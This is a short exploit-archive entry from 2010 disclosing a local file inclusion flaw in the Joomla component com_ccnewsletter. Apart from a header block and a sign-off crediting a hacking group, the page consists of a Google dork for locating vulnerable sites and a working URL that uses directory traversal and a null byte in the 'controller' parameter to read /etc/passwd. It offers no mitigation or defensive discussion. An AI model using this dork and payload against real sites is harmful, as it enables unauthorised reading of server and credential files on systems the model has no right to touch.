[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Joomla Component com_ccnewsletter LFI Vulnerability
# Published : 2010-01-28
# Author : AtT4CKxT3rR0r1ST
# Previous Title : Joomla Component jVideoDirect Blind SQL Injection Vulnerability
# Next Title : Joomla VirtueMart Module (Customers_who_bought...) SQL Injection Vulnerability
Joomla Component com_ccnewsletter Local File Inclusion
==========================================================
###########################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Email : F.Hack@w.cn
.:. Home : www.sec-attack.com/vb
.:. Script : Joomla Component com_ccnewsletter
.:. Bug Type : Local File Inclusion [LFI]
.:. Dork : inurl:"com_ccnewsletter"
.:. Date : 28/1/2010
#############################################
===[ Exploit ]===
http://server/index.php?option=com_ccnewsletter&controller=[LFI]
http://server/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00
#############################################
Greats T0: My Mind & All member Sec Attack